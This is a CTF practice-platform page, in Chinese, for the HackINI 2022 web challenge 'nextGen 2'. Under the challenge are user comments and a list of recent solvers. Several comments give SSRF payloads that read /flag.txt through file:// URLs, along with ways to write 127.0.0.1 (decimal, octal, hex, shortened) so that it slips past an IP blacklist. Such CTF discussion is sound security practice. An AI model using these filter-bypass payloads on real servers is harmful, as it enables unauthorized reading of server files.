nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 1205
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
...
登录回复
评论
GNMO 1月前
举报

file叫本地文件传输协议file://127.0.0.1/C:/ 本地C盘 file://localhost/D:/ 本地D盘 file:///E:/ 本地E盘

回复 0
Aerelin 4月前
举报

为什么改完包发送依旧拿不到flag

回复 0
bugfuck2 6月前
举报

service=file://127.0.0.01/flag.txt

回复 1
bugku111222 9月前
举报

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0
零基础110 9月前
举报

shellmates{**********}

回复 0
2ew123123124 9月前
举报

shellmates{******}

回复 0
lunarbyside 9月前
举报

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 2
脆脆sha_ 1年前
举报

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 1
divinesh 7月前
举报

niude

回复 0
意大利炮 1年前
举报

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 4
MOCHAOLIN 1年前
举报

POST /request HTTP/1.1 Host: 82.157.146.43:10782 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

WriteUp

image
hopeinhand

1 金币

立即查看

评分(0)

暂无评分

解题动态

callmeyu 攻破了该题 3天前
sky1 攻破了该题 5天前
xiaomenghua 攻破了该题 6天前
erobot 攻破了该题 6天前
1211020612 攻破了该题 7天前
xqy520 攻破了该题 7天前
nationald 攻破了该题 9天前
ytdhblk 攻破了该题 9天前
shikamaru 攻破了该题 10天前
amik 攻破了该题 10天前
lynn19920229 攻破了该题 10天前
飞行雪融 攻破了该题 11天前
李逍遥逛霍格沃茨 攻破了该题 13天前
david666 攻破了该题 14天前
出题人我会一直让你等着 攻破了该题 16天前
yyt030 攻破了该题 19天前
guoadmin 攻破了该题 24天前
tytytg 攻破了该题 25天前
noobsuper 攻破了该题 25天前
xiangsi 攻破了该题 27天前
问题反馈